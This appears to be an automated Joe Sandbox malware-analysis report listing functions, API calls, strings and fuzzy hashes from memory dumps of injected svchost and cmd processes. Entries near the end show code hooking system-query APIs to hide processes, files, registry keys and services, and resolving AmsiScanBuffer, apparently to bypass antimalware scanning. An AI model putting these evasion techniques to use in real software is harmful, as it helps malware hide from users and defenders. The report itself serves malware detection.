Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 29775ddb8eedb62f5ada1bd054c78af7f280b6f7b68867b30ebbc2d326d0bcc4
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6151F032311E00CAEF56CFA5E464BAC3BD3F344B98F558165EA5A67B88DB79C841CB00

Function 00000195DD599AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000195DD599BA7

Strings

RCC, xrefs: 00000195DD599B77
MOC, xrefs: 00000195DD599B6F

Memory Dump Source

Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: b1bea100d76148bae04666946bc4ea4da6b94d1863638acf32ae679a5d19648a
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1461AB72508BC4C1EB328F55E4903DABBE1F79AB88F045215EB9827B99DB78D190CF00

Function 00000195DE1A25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000195DE1A26C2
StrCpyW.SHLWAPI ref: 00000195DE1A26D9

Strings

\\.\pipe\, xrefs: 00000195DE1A26CD

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 289cc0cfee017aced1784072c20722df1c9c11ae38d585e13469654fd3006fa2
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 98512536344F8041E726CEE6A4753FA67D3F3A5780F540025CD5963B99DA39EA0EE740

Function 00000195DD5C25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000195DD5C26C2
StrCpyW.SHLWAPI ref: 00000195DD5C26D9

Strings

\\.\pipe\, xrefs: 00000195DD5C26CD

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 001635b25ecbbca0764ac1bd40efed090f4d1425ca32901256f566a875773509
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 8151E336305B8981E7269EAEA4B47EA7BE3F385B80F484025CD59A3F89DE39C544C740

Function 00000195DE1B2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000195DE1B2778
GetLastError.KERNEL32 ref: 00000195DE1B279D

Strings

U, xrefs: 00000195DE1B2722

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: d238e6998b5e2b77e7a7b46b671436c4e8c6a49a1263db79977df49747d26fd5
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 56411332725E8086E721DFE5E4547DAB3E6F399784F800121EE4D97748EB38D449DB40

Function 00000195DD5D2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000195DD5D2778
GetLastError.KERNEL32 ref: 00000195DD5D279D

Strings

U, xrefs: 00000195DD5D2722

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 56a8855b67026a91c41b2927fdf25b9cf162a7356cba85eee3ecc2f35be29a90
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 94411532625F8086E721DFA5E454BDAB7E2F388784F844121EE4D97B58EF38C441CB50

Function 00000195DE1A9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000195DE1A91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000195DE1A87F7), ref: 00000195DE1A9209

Strings

csm, xrefs: 00000195DE1A91F6

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 1f0663a2cf57870164fc2c7ef215a478df49844674e22c2ee3273b6fc497c742
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: DE112B32214F8082EB62CB95F454399B7E6F788B94F584220EE8D17B64DF3CD596CB00

Function 00000195DD5C9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000195DD5C91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000195DD5C87F7), ref: 00000195DD5C9209

Strings

csm, xrefs: 00000195DD5C91F6

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 9f852941d586325415fa13cdfd8bf5ced8ecbe2e3a3872ee2f508464c272930c
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: EB116A32215F8482EB228F29F414289B7E2F789B84F584224EE8D57B68DF7CC551CB00

Function 00000195DE1A1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DE1A1D69
HeapAlloc.KERNEL32 ref: 00000195DE1A1D77
GetProcessHeap.KERNEL32 ref: 00000195DE1A1D9C
HeapFree.KERNEL32 ref: 00000195DE1A1DAA

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: c6bde2f5f7b74ed1ac78c42c291b3df62365bec3f175b714d33f3a2c29db5653
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 92118B21B01F8081EB16CBE6A8192A977E2F7C9FC0F584024DE8E63724EF38E4469300

Function 00000195DD5C1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DD5C1D69
HeapAlloc.KERNEL32 ref: 00000195DD5C1D77
GetProcessHeap.KERNEL32 ref: 00000195DD5C1D9C
HeapFree.KERNEL32 ref: 00000195DD5C1DAA

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 1578604135d5ec20d7691f9046390aa0cf3ac4c6c3ad8786124130774ae32015
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 9A11C431A01F8491EB16CBAAA41419977F2FB89FC0F584024DE8EA3B24EF78C442C300

Function 00000195DE1A1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DE1A126A
HeapAlloc.KERNEL32 ref: 00000195DE1A1279
GetProcessHeap.KERNEL32 ref: 00000195DE1A1293
HeapAlloc.KERNEL32 ref: 00000195DE1A12A4

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 0f6c70fe7d26b32a50828852024bbf15df4beab49a6e5f5a2d1ff665162387e6
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 90E06D31711A049AE7168FE2D82838936E3FBD9F06F44C024C90907350EF7D949DA740

Function 00000195DD5C1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DD5C126A
HeapAlloc.KERNEL32 ref: 00000195DD5C1279
GetProcessHeap.KERNEL32 ref: 00000195DD5C1293
HeapAlloc.KERNEL32 ref: 00000195DD5C12A4

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 7dddb5b11e79e2c1677b197449cc23741c8a198749c140a1eed65376eb36c9b5
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 9CE09231601A04AAE7158FE2D8283893AE2FB8DF06F44C024C98A07750EFBD84D9C761

Function 00000195DE1A1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DE1A1006
HeapAlloc.KERNEL32 ref: 00000195DE1A1015
GetProcessHeap.KERNEL32 ref: 00000195DE1A1028
HeapAlloc.KERNEL32 ref: 00000195DE1A1037

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 7e407ad29bb8089973a9244abba3d547fe5d66ba0724ead9bf4e6c64c4f286c4
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: CFE0ED717219049AE71A9BA2D81429976E3FB99B16F448024C90907310EE38949DA710

Function 00000195DD5C1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DD5C1006
HeapAlloc.KERNEL32 ref: 00000195DD5C1015
GetProcessHeap.KERNEL32 ref: 00000195DD5C1028
HeapAlloc.KERNEL32 ref: 00000195DD5C1037

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4787daf7e42f4a14c43f04521295530a1fa3462f2fd7cfb85936864433249c56
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: E7E01271611904ABE7199FE2DC143997AE2FF8DF16F448024C94A07710EE7C8499D721

Analysis Process: cmd.exePID: 2820, Parent PID: 6548COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1958
Total number of Limit Nodes:	6

Executed Functions

Function 00000192913E1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000192913E1E7F

Part of subcall function 00000192913E22A8: GetModuleHandleA.KERNEL32(?,?,?,00000192913E1EB1), ref: 00000192913E22C0
Part of subcall function 00000192913E22A8: GetProcAddress.KERNEL32(?,?,?,00000192913E1EB1), ref: 00000192913E22D1

CreateThread.KERNELBASE ref: 00000192913E2043
TlsAlloc.KERNEL32 ref: 00000192913E2049
TlsAlloc.KERNEL32 ref: 00000192913E2055
TlsAlloc.KERNEL32 ref: 00000192913E2061
TlsAlloc.KERNEL32 ref: 00000192913E206D
TlsAlloc.KERNEL32 ref: 00000192913E2079
TlsAlloc.KERNEL32 ref: 00000192913E2085

Strings

NtEnumerateKey, xrefs: 00000192913E1F19
PdhGetRawCounterArrayW, xrefs: 00000192913E1FD0
pdh.dll, xrefs: 00000192913E1FD7, 00000192913E1FF8
NtEnumerateValueKey, xrefs: 00000192913E1F36
PdhGetFormattedCounterArrayW, xrefs: 00000192913E1FF1
sechost.dll, xrefs: 00000192913E1F99
NtDeviceIoControlFile, xrefs: 00000192913E1FB6
advapi32.dll, xrefs: 00000192913E1F57, 00000192913E1F78
NtQueryDirectoryFile, xrefs: 00000192913E1EDF
EnumServicesStatusExW, xrefs: 00000192913E1F71, 00000192913E1F92
ntdll.dll, xrefs: 00000192913E1E8D
amsi.dll, xrefs: 00000192913E2019
AmsiScanBuffer, xrefs: 00000192913E2012
EnumServiceGroupW, xrefs: 00000192913E1F50
NtResumeThread, xrefs: 00000192913E1EC2
NtQuerySystemInformation, xrefs: 00000192913E1EA5
NtQueryDirectoryFileEx, xrefs: 00000192913E1EFC

Memory Dump Source

Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true

Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 8dcfc23cf0d4ca031d62e705fd7d05989bdeb59fb6d6af87bab6df0c16231e51
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 32516BB0154A6AB6FB00EB67EC75BD42330B74674CFA1552BE41A02677DE78C25EC388

Function 00000192913E1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000192913E1E47
GetProcAddress.KERNEL32 ref: 00000192913E1E57
SleepEx.KERNELBASE ref: 00000192913E1E67

Strings

amsi.dll, xrefs: 00000192913E1E40
AmsiScanBuffer, xrefs: 00000192913E1E50

Memory Dump Source

Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true

Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 836f0419d173c4bafe70e60eb17a6274d1ecc2b3e229ab63c99ba83969ec4edd
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 9ED06731661625F6FE086B13E8B4BD42271BBA4B09FE5043DC50F017A6DE3C89598348

Function 00000192913E3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000192913E3A35
PathFindFileNameW.SHLWAPI ref: 00000192913E3A44

Part of subcall function 00000192913E3F88: StrCmpNIW.SHLWAPI(?,?,?,00000192913E272F), ref: 00000192913E3FA0

Part of subcall function 00000192913E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3EDB
Part of subcall function 00000192913E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F0E
Part of subcall function 00000192913E3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F2E
Part of subcall function 00000192913E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F47
Part of subcall function 00000192913E3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000192913E3A5B), ref: 00000192913E3F68

CreateThread.KERNELBASE ref: 00000192913E3A8B

Part of subcall function 00000192913E1E74: GetCurrentThread.KERNEL32 ref: 00000192913E1E7F
Part of subcall function 00000192913E1E74: CreateThread.KERNELBASE ref: 00000192913E2043
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2049
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2055
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2061
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E206D
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2079
Part of subcall function 00000192913E1E74: TlsAlloc.KERNEL32 ref: 00000192913E2085

Memory Dump Source

Source File: 0000000D.00000002.3508256782.00000192913E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000192913E0000, based on PE: true

Associated: 0000000D.00000002.3507302928.00000192913E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3509739616.00000192913F5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3510641431.0000019291400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3511580095.0000019291402000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3512425263.0000019291409000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_192913e0000_cmd.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
